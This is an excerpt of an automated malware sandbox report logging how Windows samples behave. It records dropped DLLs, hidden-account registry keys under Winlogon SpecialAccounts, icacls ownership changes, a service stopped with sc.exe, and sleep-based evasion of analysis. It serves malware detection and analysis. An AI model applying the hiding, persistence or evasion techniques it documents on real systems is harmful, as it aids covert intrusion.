Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Windows\Temp\FHLBnhuN	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Windows\Temp\1kuzcKGx	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Windows\Temp\KXEmxT2p	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\euasv89vr56qz5toefmgc1.exe

File created: C:\Users\user\AppData\Local\Temp\installer.log

Jump to behavior

Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe

Code function: 23_2_00007FF620941DBC strcmp,strcmp,StartServiceCtrlDispatcherA,_read,GetLastError,

23_2_00007FF620941DBC

Source: C:\Users\user\AppData\Local\Temp\euasv89vr56qz5toefmgc1.exe

Process created: C:\Windows\System32\sc.exe sc.exe stop RDP-Controller

Hooking and other Techniques for Hiding and Protection

Contains functionality to hide user accounts

Source: BFCAAEHJDB.exe, 00000007.00000003.2859028722.00000000044A4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: BFCAAEHJDB.exe, 00000007.00000003.2859028722.00000000044A4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListsam_user_test_special_accountsam_user_set_special_account(is_set == 0) \|\| (is_set == 1)SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts[E] (%s) -> Failed(s_sid=%s,is_set=%d,err=%08x)
Source: BFCAAEHJDB.exe, 00000007.00000003.2850857977.00000000044A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: BFCAAEHJDB.exe, 00000007.00000003.2850857977.00000000044A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListsam_user_test_special_accountsam_user_set_special_account(is_set == 0) \|\| (is_set == 1)SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts[E] (%s) -> Failed(s_sid=%s,is_set=%d,err=%08x)
Source: euasv89vr56qz5toefmgc1.exe, 0000000E.00000000.2871865920.00007FF67096E000.00000008.00000001.01000000.0000000C.sdmp	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: euasv89vr56qz5toefmgc1.exe, 0000000E.00000000.2871865920.00007FF67096E000.00000008.00000001.01000000.0000000C.sdmp	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListsam_user_test_special_accountsam_user_set_special_account(is_set == 0) \|\| (is_set == 1)SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts[E] (%s) -> Failed(s_sid=%s,is_set=%d,err=%08x)
Source: main.exe	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: main.exe, 00000017.00000002.3440296730.000001E398B72000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: main.exe, 00000017.00000002.3440296730.000001E398B72000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListsam_user_test_special_accountsam_user_set_special_account(is_set == 0) \|\| (is_set == 1)SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts[E] (%s) -> Failed(s_sid=%s,is_set=%d,err=%08x)
Source: main.exe, 00000017.00000002.3443178885.00007FFDA38A4000.00000002.00000001.01000000.00000015.sdmp	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: main.exe, 00000017.00000002.3443178885.00007FFDA38A4000.00000002.00000001.01000000.00000015.sdmp	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListsam_user_test_special_accountsam_user_set_special_account(is_set == 0) \|\| (is_set == 1)SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts[E] (%s) -> Failed(s_sid=%s,is_set=%d,err=%08x)
Source: Lx9RtFcl.23.dr	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: Lx9RtFcl.23.dr	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListsam_user_test_special_accountsam_user_set_special_account(is_set == 0) \|\| (is_set == 1)SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts[E] (%s) -> Failed(s_sid=%s,is_set=%d,err=%08x)

Extensive use of GetProcAddress (often used to hide API calls)

Source: C:\Users\user\Desktop\file.exe

0_2_00417A40

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Source: C:\Users\user\Desktop\file.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Uses cacls to modify the permissions of files

Source: C:\Users\user\AppData\Local\Temp\euasv89vr56qz5toefmgc1.exe

Process created: C:\Windows\System32\icacls.exe icacls.exe C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\ /setowner *S-1-5-18

Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\BFCAAEHJDB.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\BFCAAEHJDB.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX

Contains functionality to enumerate running services

Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe

Code function: GetLastError,EnumServicesStatusExA,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,strlen,strlen,GetProcessHeap,HeapAlloc,strcpy,

23_2_00007FFDA38C7694

Contains functionality to query network adapater information

Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetAdaptersInfo,	23_2_00007FFDA38960C8
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetAdaptersInfo,	23_2_00007FFDA38CB648
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetAdaptersInfo,	23_2_00007FFDAC0A2738
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetAdaptersInfo,	23_2_00007FFDAC0D30A8
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetAdaptersInfo,	23_2_00007FFDAC0F4978
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetAdaptersInfo,	23_2_00007FFDAC121D98

Found dropped PE file which has not been started or loaded

Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Dropped PE file which has not been started: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\evtsrv.dll	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Dropped PE file which has not been started: C:\Windows\Temp\g29qQU9G	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Dropped PE file which has not been started: C:\Windows\Temp\Lx9RtFcl	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Dropped PE file which has not been started: C:\Windows\Temp\KXEmxT2p	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Dropped PE file which has not been started: C:\Windows\Temp\S7evpAMe	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Dropped PE file which has not been started: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\prgmgr.dll	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Dropped PE file which has not been started: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\rdpctl.dll	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Dropped PE file which has not been started: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\termsrv32.dll	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Dropped PE file which has not been started: C:\Windows\Temp\h0yu5TYE	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Dropped PE file which has not been started: C:\Windows\Temp\1kuzcKGx	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Dropped PE file which has not been started: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\rfxvmt.dll	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Dropped PE file which has not been started: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\samctl.dll	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Dropped PE file which has not been started: C:\Windows\Temp\FHLBnhuN	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Dropped PE file which has not been started: C:\Windows\Temp\fJw4qvYl	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Dropped PE file which has not been started: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\cnccli.dll	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Dropped PE file which has not been started: C:\Windows\Temp\feJ0dymt	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Dropped PE file which has not been started: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\dwlmgr.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\ProgramData\softokn3.dll	Jump to dropped file

Found evasive API chain (date check)

Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe

Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

Found large amount of non-executed APIs

Source: C:\Users\user\Desktop\file.exe

API coverage: 6.4 %

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\ProgramData\BFCAAEHJDB.exe TID: 3616	Thread sleep count: 103 > 30	Jump to behavior
Source: C:\ProgramData\BFCAAEHJDB.exe TID: 3616	Thread sleep time: -6180000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe TID: 5140	Thread sleep count: 85 > 30	Jump to behavior
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe TID: 3756	Thread sleep count: 58 > 30
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe TID: 1112	Thread sleep count: 52 > 30
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe TID: 7132	Thread sleep count: 41 > 30

Queries keyboard layouts

Source: C:\ProgramData\BFCAAEHJDB.exe	Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809	Jump to behavior
Source: C:\ProgramData\BFCAAEHJDB.exe	Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809	Jump to behavior
Source: C:\ProgramData\BFCAAEHJDB.exe	Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809	Jump to behavior
Source: C:\ProgramData\BFCAAEHJDB.exe	Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809	Jump to behavior

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\ProgramData\BFCAAEHJDB.exe	Last function: Thread delayed
Source: C:\ProgramData\BFCAAEHJDB.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Last function: Thread delayed
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\file.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

